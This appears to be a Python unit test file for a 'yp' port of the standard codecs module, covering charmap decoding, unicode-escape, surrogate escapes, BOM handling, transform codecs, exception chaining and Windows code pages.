@yp_unittest.skip_str_codecs
class CharmapTest(yp_unittest.TestCase):
def test_decode_with_string_map(self):
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict", "abc"),
("abc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict", "\U0010FFFFbc"),
("\U0010FFFFbc", 3)
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict", "ab"
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict", "ab\ufffe"
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace", "ab"),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace", "ab\ufffe"),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore", "ab"),
("ab", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore", "ab\ufffe"),
("ab", 3)
)
allbytes = bytes(range(256))
self.assertEqual(
codecs.charmap_decode(allbytes, "ignore", ""),
("", len(allbytes))
)
def test_decode_with_int2str_map(self):
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b', 2: 'c'}),
("abc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: 'Aa', 1: 'Bb', 2: 'Cc'}),
("AaBbCc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: '\U0010FFFF', 1: 'b', 2: 'c'}),
("\U0010FFFFbc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b', 2: ''}),
("ab", 3)
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b'}
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b', 2: None}
)
# Issue #14850
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: 'a', 1: 'b', 2: '\ufffe'}
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: 'a', 1: 'b'}),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: 'a', 1: 'b', 2: None}),
("ab\ufffd", 3)
)
# Issue #14850
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: 'a', 1: 'b', 2: '\ufffe'}),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: 'a', 1: 'b'}),
("ab", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: 'a', 1: 'b', 2: None}),
("ab", 3)
)
# Issue #14850
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: 'a', 1: 'b', 2: '\ufffe'}),
("ab", 3)
)
allbytes = bytes(range(256))
self.assertEqual(
codecs.charmap_decode(allbytes, "ignore", {}),
("", len(allbytes))
)
def test_decode_with_int2int_map(self):
a = ord('a')
b = ord('b')
c = ord('c')
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: a, 1: b, 2: c}),
("abc", 3)
)
# Issue #15379
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: 0x10FFFF, 1: b, 2: c}),
("\U0010FFFFbc", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "strict",
{0: sys.maxunicode, 1: b, 2: c}),
(chr(sys.maxunicode) + "bc", 3)
)
self.assertRaises(TypeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: sys.maxunicode + 1, 1: b, 2: c}
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: a, 1: b},
)
self.assertRaises(UnicodeDecodeError,
codecs.charmap_decode, b"\x00\x01\x02", "strict",
{0: a, 1: b, 2: 0xFFFE},
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: a, 1: b}),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "replace",
{0: a, 1: b, 2: 0xFFFE}),
("ab\ufffd", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: a, 1: b}),
("ab", 3)
)
self.assertEqual(
codecs.charmap_decode(b"\x00\x01\x02", "ignore",
{0: a, 1: b, 2: 0xFFFE}),
("ab", 3)
)
@yp_unittest.skip_str_codecs
class WithStmtTest(yp_unittest.TestCase):
def test_encodedfile(self):
f = io.BytesIO(b"\xc3\xbc")
with codecs.EncodedFile(f, "latin-1", "utf-8") as ef:
self.assertEqual(ef.read(), b"\xfc")
def test_streamreaderwriter(self):
f = io.BytesIO(b"\xc3\xbc")
info = codecs.lookup("utf-8")
with codecs.StreamReaderWriter(f, info.streamreader,
info.streamwriter, 'strict') as srw:
self.assertEqual(srw.read(), "\xfc")
@yp_unittest.skip_str_codecs
class TypesTest(yp_unittest.TestCase):
def test_decode_unicode(self):
# Most decoders don't accept unicode input
decoders = [
codecs.utf_7_decode,
codecs.utf_8_decode,
codecs.utf_16_le_decode,
codecs.utf_16_be_decode,
codecs.utf_16_ex_decode,
codecs.utf_32_decode,
codecs.utf_32_le_decode,
codecs.utf_32_be_decode,
codecs.utf_32_ex_decode,
codecs.latin_1_decode,
codecs.ascii_decode,
codecs.charmap_decode,
]
if hasattr(codecs, "mbcs_decode"):
decoders.append(codecs.mbcs_decode)
for decoder in decoders:
self.assertRaises(TypeError, decoder, "xxx")
def test_unicode_escape(self):
# Escape-decoding an unicode string is supported ang gives the same
# result as decoding the equivalent ASCII bytes string.
self.assertEqual(codecs.unicode_escape_decode(r"\u1234"), ("\u1234", 6))
self.assertEqual(codecs.unicode_escape_decode(br"\u1234"), ("\u1234", 6))
self.assertEqual(codecs.raw_unicode_escape_decode(r"\u1234"), ("\u1234", 6))
self.assertEqual(codecs.raw_unicode_escape_decode(br"\u1234"), ("\u1234", 6))
self.assertRaises(UnicodeDecodeError, codecs.unicode_escape_decode, br"\U00110000")
self.assertEqual(codecs.unicode_escape_decode(r"\U00110000", "replace"), ("\ufffd", 10))
self.assertRaises(UnicodeDecodeError, codecs.raw_unicode_escape_decode, br"\U00110000")
self.assertEqual(codecs.raw_unicode_escape_decode(r"\U00110000", "replace"), ("\ufffd", 10))
@yp_unittest.skip_str_codecs
class UnicodeEscapeTest(yp_unittest.TestCase):
def test_empty(self):
self.assertEqual(codecs.unicode_escape_encode(""), (b"", 0))
self.assertEqual(codecs.unicode_escape_decode(b""), ("", 0))
def test_raw_encode(self):
encode = codecs.unicode_escape_encode
for b in range(32, 127):
if b != b'\\'[0]:
self.assertEqual(encode(chr(b)), (bytes([b]), 1))
def test_raw_decode(self):
decode = codecs.unicode_escape_decode
for b in range(256):
if b != b'\\'[0]:
self.assertEqual(decode(bytes([b]) + b'0'), (chr(b) + '0', 2))
def test_escape_encode(self):
encode = codecs.unicode_escape_encode
check = coding_checker(self, encode)
check('\t', br'\t')
check('\n', br'\n')
check('\r', br'\r')
check('\\', br'\\')
for b in range(32):
if chr(b) not in '\t\n\r':
check(chr(b), ('\\x%02x' % b).encode())
for b in range(127, 256):
check(chr(b), ('\\x%02x' % b).encode())
check('\u20ac', br'\u20ac')
check('\U0001d120', br'\U0001d120')
def test_escape_decode(self):
decode = codecs.unicode_escape_decode
check = coding_checker(self, decode)
check(b"[\\\n]", "[]")
check(br'[\"]', '["]')
check(br"[\']", "[']")
check(br"[\\]", "[\\]")
check(br"[\a]", "[\x07]")
check(br"[\b]", "[\x08]")
check(br"[\t]", "[\x09]")
check(br"[\n]", "[\x0a]")
check(br"[\v]", "[\x0b]")
check(br"[\f]", "[\x0c]")
check(br"[\r]", "[\x0d]")
check(br"[\7]", "[\x07]")
check(br"[\8]", r"[\8]")
check(br"[\78]", "[\x078]")
check(br"[\41]", "[!]")
check(br"[\418]", "[!8]")
check(br"[\101]", "[A]")
check(br"[\1010]", "[A0]")
check(br"[\x41]", "[A]")
check(br"[\x410]", "[A0]")
check(br"\u20ac", "\u20ac")
check(br"\U0001d120", "\U0001d120")
for b in range(256):
if b not in b'\n"\'\\abtnvfr01234567xuUN':
check(b'\\' + bytes([b]), '\\' + chr(b))
def test_decode_errors(self):
decode = codecs.unicode_escape_decode
for c, d in (b'x', 2), (b'u', 4), (b'U', 4):
for i in range(d):
self.assertRaises(UnicodeDecodeError, decode,
b"\\" + c + b"0"*i)
self.assertRaises(UnicodeDecodeError, decode,
b"[\\" + c + b"0"*i + b"]")
data = b"[\\" + c + b"0"*i + b"]\\" + c + b"0"*i
self.assertEqual(decode(data, "ignore"), ("[]", len(data)))
self.assertEqual(decode(data, "replace"),
("[\ufffd]\ufffd", len(data)))
self.assertRaises(UnicodeDecodeError, decode, br"\U00110000")
self.assertEqual(decode(br"\U00110000", "ignore"), ("", 10))
self.assertEqual(decode(br"\U00110000", "replace"), ("\ufffd", 10))
@yp_unittest.skip_str_codecs
class RawUnicodeEscapeTest(yp_unittest.TestCase):
def test_empty(self):
self.assertEqual(codecs.raw_unicode_escape_encode(""), (b"", 0))
self.assertEqual(codecs.raw_unicode_escape_decode(b""), ("", 0))
def test_raw_encode(self):
encode = codecs.raw_unicode_escape_encode
for b in range(256):
self.assertEqual(encode(chr(b)), (bytes([b]), 1))
def test_raw_decode(self):
decode = codecs.raw_unicode_escape_decode
for b in range(256):
self.assertEqual(decode(bytes([b]) + b'0'), (chr(b) + '0', 2))
def test_escape_encode(self):
encode = codecs.raw_unicode_escape_encode
check = coding_checker(self, encode)
for b in range(256):
if b not in b'uU':
check('\\' + chr(b), b'\\' + bytes([b]))
check('\u20ac', br'\u20ac')
check('\U0001d120', br'\U0001d120')
def test_escape_decode(self):
decode = codecs.raw_unicode_escape_decode
check = coding_checker(self, decode)
for b in range(256):
if b not in b'uU':
check(b'\\' + bytes([b]), '\\' + chr(b))
check(br"\u20ac", "\u20ac")
check(br"\U0001d120", "\U0001d120")
def test_decode_errors(self):
decode = codecs.raw_unicode_escape_decode
for c, d in (b'u', 4), (b'U', 4):
for i in range(d):
self.assertRaises(UnicodeDecodeError, decode,
b"\\" + c + b"0"*i)
self.assertRaises(UnicodeDecodeError, decode,
b"[\\" + c + b"0"*i + b"]")
data = b"[\\" + c + b"0"*i + b"]\\" + c + b"0"*i
self.assertEqual(decode(data, "ignore"), ("[]", len(data)))
self.assertEqual(decode(data, "replace"),
("[\ufffd]\ufffd", len(data)))
self.assertRaises(UnicodeDecodeError, decode, br"\U00110000")
self.assertEqual(decode(br"\U00110000", "ignore"), ("", 10))
self.assertEqual(decode(br"\U00110000", "replace"), ("\ufffd", 10))
@yp_unittest.skip_str_codecs
class SurrogateEscapeTest(yp_unittest.TestCase):
def test_utf8(self):
# Bad byte
self.assertEqual(b"foo\x80bar".decode("utf-8", "surrogateescape"),
"foo\udc80bar")
self.assertEqual("foo\udc80bar".encode("utf-8", "surrogateescape"),
b"foo\x80bar")
# bad-utf-8 encoded surrogate
self.assertEqual(b"\xed\xb0\x80".decode("utf-8", "surrogateescape"),
"\udced\udcb0\udc80")
self.assertEqual("\udced\udcb0\udc80".encode("utf-8", "surrogateescape"),
b"\xed\xb0\x80")
def test_ascii(self):
# bad byte
self.assertEqual(b"foo\x80bar".decode("ascii", "surrogateescape"),
"foo\udc80bar")
self.assertEqual("foo\udc80bar".encode("ascii", "surrogateescape"),
b"foo\x80bar")
def test_charmap(self):
# bad byte: \xa5 is unmapped in iso-8859-3
self.assertEqual(b"foo\xa5bar".decode("iso-8859-3", "surrogateescape"),
"foo\udca5bar")
self.assertEqual("foo\udca5bar".encode("iso-8859-3", "surrogateescape"),
b"foo\xa5bar")
def test_latin1(self):
# Issue6373
self.assertEqual("\udce4\udceb\udcef\udcf6\udcfc".encode("latin-1", "surrogateescape"),
b"\xe4\xeb\xef\xf6\xfc")
@yp_unittest.skip_str_codecs
class BomTest(yp_unittest.TestCase):
def test_seek0(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
self.addCleanup(support.unlink, support.TESTFN)
for encoding in tests:
# Check if the BOM is written only once
with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
# Check that the BOM is written after a seek(0)
with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
f.write(data[0])
self.assertNotEqual(f.tell(), 0)
f.seek(0)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data)
# (StreamWriter) Check that the BOM is written after a seek(0)
with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
f.writer.write(data[0])
self.assertNotEqual(f.writer.tell(), 0)
f.writer.seek(0)
f.writer.write(data)
f.seek(0)
self.assertEqual(f.read(), data)
# Check that the BOM is not written after a seek() at a position
# different than the start
with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
f.write(data)
f.seek(f.tell())
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
# (StreamWriter) Check that the BOM is not written after a seek()
# at a position different than the start
with codecs.open(support.TESTFN, 'w+', encoding=encoding) as f:
f.writer.write(data)
f.writer.seek(f.writer.tell())
f.writer.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
bytes_transform_encodings = [
"base64_codec",
"uu_codec",
"quopri_codec",
"hex_codec",
]
transform_aliases = {
"base64_codec": ["base64", "base_64"],
"uu_codec": ["uu"],
"quopri_codec": ["quopri", "quoted_printable", "quotedprintable"],
"hex_codec": ["hex"],
"rot_13": ["rot13"],
}
try:
import zlib
except ImportError:
zlib = None
else:
bytes_transform_encodings.append("zlib_codec")
transform_aliases["zlib_codec"] = ["zip", "zlib"]
try:
import bz2
except ImportError:
pass
else:
bytes_transform_encodings.append("bz2_codec")
transform_aliases["bz2_codec"] = ["bz2"]
@yp_unittest.skip_str_codecs
class TransformCodecTest(yp_unittest.TestCase):
def test_basics(self):
binput = bytes(range(256))
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
# generic codecs interface
(o, size) = codecs.getencoder(encoding)(binput)
self.assertEqual(size, len(binput))
(i, size) = codecs.getdecoder(encoding)(o)
self.assertEqual(size, len(o))
self.assertEqual(i, binput)
def test_read(self):
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
sin = codecs.encode(b"\x80", encoding)
reader = codecs.getreader(encoding)(io.BytesIO(sin))
sout = reader.read()
self.assertEqual(sout, b"\x80")
def test_readline(self):
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
sin = codecs.encode(b"\x80", encoding)
reader = codecs.getreader(encoding)(io.BytesIO(sin))
sout = reader.readline()
self.assertEqual(sout, b"\x80")
def test_buffer_api_usage(self):
# We check all the transform codecs accept memoryview input
# for encoding and decoding
# and also that they roundtrip correctly
original = b"12345\x80"
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
data = original
view = memoryview(data)
data = codecs.encode(data, encoding)
view_encoded = codecs.encode(view, encoding)
self.assertEqual(view_encoded, data)
view = memoryview(data)
data = codecs.decode(data, encoding)
self.assertEqual(data, original)
view_decoded = codecs.decode(view, encoding)
self.assertEqual(view_decoded, data)
def test_text_to_binary_blacklists_binary_transforms(self):
# Check binary -> binary codecs give a good error for str input
bad_input = "bad input type"
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
fmt = ( "{!r} is not a text encoding; "
"use codecs.encode\(\) to handle arbitrary codecs")
msg = fmt.format(encoding)
with self.assertRaisesRegex(LookupError, msg) as failure:
bad_input.encode(encoding)
self.assertIsNone(failure.exception.__cause__)
def test_text_to_binary_blacklists_text_transforms(self):
# Check str.encode gives a good error message for str -> str codecs
msg = (r"^'rot_13' is not a text encoding; "
"use codecs.encode\(\) to handle arbitrary codecs")
with self.assertRaisesRegex(LookupError, msg):
"just an example message".encode("rot_13")
def test_binary_to_text_blacklists_binary_transforms(self):
# Check bytes.decode and bytearray.decode give a good error
# message for binary -> binary codecs
data = b"encode first to ensure we meet any format restrictions"
for encoding in bytes_transform_encodings:
with self.subTest(encoding=encoding):
encoded_data = codecs.encode(data, encoding)
fmt = (r"{!r} is not a text encoding; "
"use codecs.decode\(\) to handle arbitrary codecs")
msg = fmt.format(encoding)
with self.assertRaisesRegex(LookupError, msg):
encoded_data.decode(encoding)
with self.assertRaisesRegex(LookupError, msg):
bytearray(encoded_data).decode(encoding)
def test_binary_to_text_blacklists_text_transforms(self):
# Check str -> str codec gives a good error for binary input
for bad_input in (b"immutable", bytearray(b"mutable")):
with self.subTest(bad_input=bad_input):
msg = (r"^'rot_13' is not a text encoding; "
"use codecs.decode\(\) to handle arbitrary codecs")
with self.assertRaisesRegex(LookupError, msg) as failure:
bad_input.decode("rot_13")
self.assertIsNone(failure.exception.__cause__)
@yp_unittest.skipUnless(zlib, "Requires zlib support")
def test_custom_zlib_error_is_wrapped(self):
# Check zlib codec gives a good error for malformed input
msg = "^decoding with 'zlib_codec' codec failed"
with self.assertRaisesRegex(Exception, msg) as failure:
codecs.decode(b"hello", "zlib_codec")
self.assertIsInstance(failure.exception.__cause__,
type(failure.exception))
def test_custom_hex_error_is_wrapped(self):
# Check hex codec gives a good error for malformed input
msg = "^decoding with 'hex_codec' codec failed"
with self.assertRaisesRegex(Exception, msg) as failure:
codecs.decode(b"hello", "hex_codec")
self.assertIsInstance(failure.exception.__cause__,
type(failure.exception))
# Unfortunately, the bz2 module throws OSError, which the codec
# machinery currently can't wrap :(
# Ensure codec aliases from http://bugs.python.org/issue7475 work
def test_aliases(self):
for codec_name, aliases in transform_aliases.items():
expected_name = codecs.lookup(codec_name).name
for alias in aliases:
with self.subTest(alias=alias):
info = codecs.lookup(alias)
self.assertEqual(info.name, expected_name)
def test_uu_invalid(self):
# Missing "begin" line
self.assertRaises(ValueError, codecs.decode, b"", "uu-codec")
# The codec system tries to wrap exceptions in order to ensure the error
# mentions the operation being performed and the codec involved. We
# currently *only* want this to happen for relatively stateless
# exceptions, where the only significant information they contain is their
# type and a single str argument.
# Use a local codec registry to avoid appearing to leak objects when
# registering multiple seach functions
_TEST_CODECS = {}
def _get_test_codec(codec_name):
return _TEST_CODECS.get(codec_name)
codecs.register(_get_test_codec) # Returns None, not usable as a decorator
try:
# Issue #22166: Also need to clear the internal cache in CPython
from _codecs import _forget_codec
except ImportError:
def _forget_codec(codec_name):
pass
@yp_unittest.skip_str_codecs
class ExceptionChainingTest(yp_unittest.TestCase):
def setUp(self):
# There's no way to unregister a codec search function, so we just
# ensure we render this one fairly harmless after the test
# case finishes by using the test case repr as the codec name
# The codecs module normalizes codec names, although this doesn't
# appear to be formally documented...
# We also make sure we use a truly unique id for the custom codec
# to avoid issues with the codec cache when running these tests
# multiple times (e.g. when hunting for refleaks)
unique_id = repr(self) + str(id(self))
self.codec_name = encodings.normalize_encoding(unique_id).lower()
# We store the object to raise on the instance because of a bad
# interaction between the codec caching (which means we can't
# recreate the codec entry) and regrtest refleak hunting (which
# runs the same test instance multiple times). This means we
# need to ensure the codecs call back in to the instance to find
# out which exception to raise rather than binding them in a
# closure to an object that may change on the next run
self.obj_to_raise = RuntimeError
def tearDown(self):
_TEST_CODECS.pop(self.codec_name, None)
# Issue #22166: Also pop from caches to avoid appearance of ref leaks
encodings._cache.pop(self.codec_name, None)
try:
_forget_codec(self.codec_name)
except KeyError:
pass
def set_codec(self, encode, decode):
codec_info = codecs.CodecInfo(encode, decode,
name=self.codec_name)
_TEST_CODECS[self.codec_name] = codec_info
@contextlib.contextmanager
def assertWrapped(self, operation, exc_type, msg):
full_msg = r"{} with {!r} codec failed \({}: {}\)".format(
operation, self.codec_name, exc_type.__name__, msg)
with self.assertRaisesRegex(exc_type, full_msg) as caught:
yield caught
self.assertIsInstance(caught.exception.__cause__, exc_type)
self.assertIsNotNone(caught.exception.__cause__.__traceback__)
def raise_obj(self, *args, **kwds):
# Helper to dynamically change the object raised by a test codec
raise self.obj_to_raise
def check_wrapped(self, obj_to_raise, msg, exc_type=RuntimeError):
self.obj_to_raise = obj_to_raise
self.set_codec(self.raise_obj, self.raise_obj)
with self.assertWrapped("encoding", exc_type, msg):
"str_input".encode(self.codec_name)
with self.assertWrapped("encoding", exc_type, msg):
codecs.encode("str_input", self.codec_name)
with self.assertWrapped("decoding", exc_type, msg):
b"bytes input".decode(self.codec_name)
with self.assertWrapped("decoding", exc_type, msg):
codecs.decode(b"bytes input", self.codec_name)
def test_raise_by_type(self):
self.check_wrapped(RuntimeError, "")
def test_raise_by_value(self):
msg = "This should be wrapped"
self.check_wrapped(RuntimeError(msg), msg)
def test_raise_grandchild_subclass_exact_size(self):
msg = "This should be wrapped"
class MyRuntimeError(RuntimeError):
__slots__ = ()
self.check_wrapped(MyRuntimeError(msg), msg, MyRuntimeError)
def test_raise_subclass_with_weakref_support(self):
msg = "This should be wrapped"
class MyRuntimeError(RuntimeError):
pass
self.check_wrapped(MyRuntimeError(msg), msg, MyRuntimeError)
def check_not_wrapped(self, obj_to_raise, msg):
def raise_obj(*args, **kwds):
raise obj_to_raise
self.set_codec(raise_obj, raise_obj)
with self.assertRaisesRegex(RuntimeError, msg):
"str input".encode(self.codec_name)
with self.assertRaisesRegex(RuntimeError, msg):
codecs.encode("str input", self.codec_name)
with self.assertRaisesRegex(RuntimeError, msg):
b"bytes input".decode(self.codec_name)
with self.assertRaisesRegex(RuntimeError, msg):
codecs.decode(b"bytes input", self.codec_name)
def test_init_override_is_not_wrapped(self):
class CustomInit(RuntimeError):
def __init__(self):
pass
self.check_not_wrapped(CustomInit, "")
def test_new_override_is_not_wrapped(self):
class CustomNew(RuntimeError):
def __new__(cls):
return super().__new__(cls)
self.check_not_wrapped(CustomNew, "")
def test_instance_attribute_is_not_wrapped(self):
msg = "This should NOT be wrapped"
exc = RuntimeError(msg)
exc.attr = 1
self.check_not_wrapped(exc, "^{}$".format(msg))
def test_non_str_arg_is_not_wrapped(self):
self.check_not_wrapped(RuntimeError(1), "1")
def test_multiple_args_is_not_wrapped(self):
msg_re = r"^\('a', 'b', 'c'\)$"
self.check_not_wrapped(RuntimeError('a', 'b', 'c'), msg_re)
# http://bugs.python.org/issue19609
def test_codec_lookup_failure_not_wrapped(self):
msg = "^unknown encoding: {}$".format(self.codec_name)
# The initial codec lookup should not be wrapped
with self.assertRaisesRegex(LookupError, msg):
"str input".encode(self.codec_name)
with self.assertRaisesRegex(LookupError, msg):
codecs.encode("str input", self.codec_name)
with self.assertRaisesRegex(LookupError, msg):
b"bytes input".decode(self.codec_name)
with self.assertRaisesRegex(LookupError, msg):
codecs.decode(b"bytes input", self.codec_name)
def test_unflagged_non_text_codec_handling(self):
# The stdlib non-text codecs are now marked so they're
# pre-emptively skipped by the text model related methods
# However, third party codecs won't be flagged, so we still make
# sure the case where an inappropriate output type is produced is
# handled appropriately
def encode_to_str(*args, **kwds):
return "not bytes!", 0
def decode_to_bytes(*args, **kwds):
return b"not str!", 0
self.set_codec(encode_to_str, decode_to_bytes)
# No input or output type checks on the codecs module functions
encoded = codecs.encode(None, self.codec_name)
self.assertEqual(encoded, "not bytes!")
decoded = codecs.decode(None, self.codec_name)
self.assertEqual(decoded, b"not str!")
# Text model methods should complain
fmt = (r"^{!r} encoder returned 'str' instead of 'bytes'; "
"use codecs.encode\(\) to encode to arbitrary types$")
msg = fmt.format(self.codec_name)
with self.assertRaisesRegex(TypeError, msg):
"str_input".encode(self.codec_name)
fmt = (r"^{!r} decoder returned 'bytes' instead of 'str'; "
"use codecs.decode\(\) to decode to arbitrary types$")
msg = fmt.format(self.codec_name)
with self.assertRaisesRegex(TypeError, msg):
b"bytes input".decode(self.codec_name)
@yp_unittest.skipUnless(sys.platform == 'win32',
'code pages are specific to Windows')
@yp_unittest.skip_str_codecs
class CodePageTest(yp_unittest.TestCase):
# CP_UTF8 is already tested by CP65001Test
CP_UTF8 = 65001
def test_invalid_code_page(self):
self.assertRaises(ValueError, codecs.code_page_encode, -1, 'a')
self.assertRaises(ValueError, codecs.code_page_decode, -1, b'a')
self.assertRaises(OSError, codecs.code_page_encode, 123, 'a')
self.assertRaises(OSError, codecs.code_page_decode, 123, b'a')
def test_code_page_name(self):
self.assertRaisesRegex(UnicodeEncodeError, 'cp932',
codecs.code_page_encode, 932, '\xff')
self.assertRaisesRegex(UnicodeDecodeError, 'cp932',
codecs.code_page_decode, 932, b'\x81\x00')
self.assertRaisesRegex(UnicodeDecodeError, 'CP_UTF8',
codecs.code_page_decode, self.CP_UTF8, b'\xff')
def check_decode(self, cp, tests):
for raw, errors, expected in tests:
if expected is not None:
try:
decoded = codecs.code_page_decode(cp, raw, errors)
except UnicodeDecodeError as err:
self.fail('Unable to decode %a from "cp%s" with '
'errors=%r: %s' % (raw, cp, errors, err))
self.assertEqual(decoded[0], expected,
'%a.decode("cp%s", %r)=%a != %a'
% (raw, cp, errors, decoded[0], expected))
# assert 0 <= decoded[1] <= len(raw)
self.assertGreaterEqual(decoded[1], 0)
self.assertLessEqual(decoded[1], len(raw))
else:
self.assertRaises(UnicodeDecodeError,
codecs.code_page_decode, cp, raw, errors)
def check_encode(self, cp, tests):
for text, errors, expected in tests:
if expected is not None:
try:
encoded = codecs.code_page_encode(cp, text, errors)
except UnicodeEncodeError as err:
self.fail('Unable to encode %a to "cp%s" with '
'errors=%r: %s' % (text, cp, errors, err))
self.assertEqual(encoded[0], expected,
'%a.encode("cp%s", %r)=%a != %a'
% (text, cp, errors, encoded[0], expected))
self.assertEqual(encoded[1], len(text))
else:
self.assertRaises(UnicodeEncodeError,
codecs.code_page_encode, cp, text, errors)
def test_cp932(self):
self.check_encode(932, (
('abc', 'strict', b'abc'),
('\uff44\u9a3e', 'strict', b'\x82\x84\xe9\x80'),
# test error handlers
('\xff', 'strict', None),
('[\xff]', 'ignore', b'[]'),
('[\xff]', 'replace', b'[y]'),
('[\u20ac]', 'replace', b'[?]'),
('[\xff]', 'backslashreplace', b'[\\xff]'),
('[\xff]', 'xmlcharrefreplace', b'[ÿ]'),
))
self.check_decode(932, (
(b'abc', 'strict', 'abc'),
(b'\x82\x84\xe9\x80', 'strict', '\uff44\u9a3e'),
# invalid bytes
(b'[\xff]', 'strict', None),
(b'[\xff]', 'ignore', '[]'),
(b'[\xff]', 'replace', '[\ufffd]'),
(b'[\xff]', 'surrogateescape', '[\udcff]'),
(b'\x81\x00abc', 'strict', None),
(b'\x81\x00abc', 'ignore', '\x00abc'),
(b'\x81\x00abc', 'replace', '\ufffd\x00abc'),
))
def test_cp1252(self):
self.check_encode(1252, (
('abc', 'strict', b'abc'),
('\xe9\u20ac', 'strict', b'\xe9\x80'),
('\xff', 'strict', b'\xff'),
('\u0141', 'strict', None),
('\u0141', 'ignore', b''),
('\u0141', 'replace', b'L'),
))
self.check_decode(1252, (
(b'abc', 'strict', 'abc'),
(b'\xe9\x80', 'strict', '\xe9\u20ac'),
(b'\xff', 'strict', '\xff'),
))
def test_cp_utf7(self):
cp = 65000
self.check_encode(cp, (
('abc', 'strict', b'abc'),
('\xe9\u20ac', 'strict', b'+AOkgrA-'),
('\U0010ffff', 'strict', b'+2//f/w-'),
('\udc80', 'strict', b'+3IA-'),
('\ufffd', 'strict', b'+//0-'),
))
self.check_decode(cp, (
(b'abc', 'strict', 'abc'),
(b'+AOkgrA-', 'strict', '\xe9\u20ac'),
(b'+2//f/w-', 'strict', '\U0010ffff'),
(b'+3IA-', 'strict', '\udc80'),
(b'+//0-', 'strict', '\ufffd'),
# invalid bytes
(b'[+/]', 'strict', '[]'),
(b'[\xff]', 'strict', '[\xff]'),
))
def test_multibyte_encoding(self):
self.check_decode(932, (
(b'\x84\xe9\x80', 'ignore', '\u9a3e'),
(b'\x84\xe9\x80', 'replace', '\ufffd\u9a3e'),
))
self.check_decode(self.CP_UTF8, (
(b'\xff\xf4\x8f\xbf\xbf', 'ignore', '\U0010ffff'),
(b'\xff\xf4\x8f\xbf\xbf', 'replace', '\ufffd\U0010ffff'),
))
if VISTA_OR_LATER:
self.check_encode(self.CP_UTF8, (
('[\U0010ffff\uDC80]', 'ignore', b'[\xf4\x8f\xbf\xbf]'),
('[\U0010ffff\uDC80]', 'replace', b'[\xf4\x8f\xbf\xbf?]'),
))
def test_incremental(self):
decoded = codecs.code_page_decode(932, b'\x82', 'strict', False)
self.assertEqual(decoded, ('', 0))
decoded = codecs.code_page_decode(932,
b'\xe9\x80\xe9', 'strict',
False)
self.assertEqual(decoded, ('\u9a3e', 2))
decoded = codecs.code_page_decode(932,
b'\xe9\x80\xe9\x80', 'strict',
False)
self.assertEqual(decoded, ('\u9a3e\u9a3e', 4))
decoded = codecs.code_page_decode(932,
b'abc', 'strict',
False)
self.assertEqual(decoded, ('abc', 3))
if __name__ == "__main__":
yp_unittest.main()
| 38.399321 | 113 | 0.544382 | from yp import *
import codecs
import contextlib
import io
import locale
import sys
from yp_test import yp_unittest
import warnings
import encodings
from yp_test import support
_str = str
def bytes( *args, **kwargs ): raise NotImplementedError( "convert script to yp_bytes here" )
def bytearray( *args, **kwargs ): raise NotImplementedError( "convert script to yp_bytearray here" )
def str( *args, **kwargs ): raise NotImplementedError( "convert script to yp_str here" )
if sys.platform == 'win32':
VISTA_OR_LATER = (sys.getwindowsversion().major >= 6)
else:
VISTA_OR_LATER = False
try:
import ctypes
except ImportError:
ctypes = None
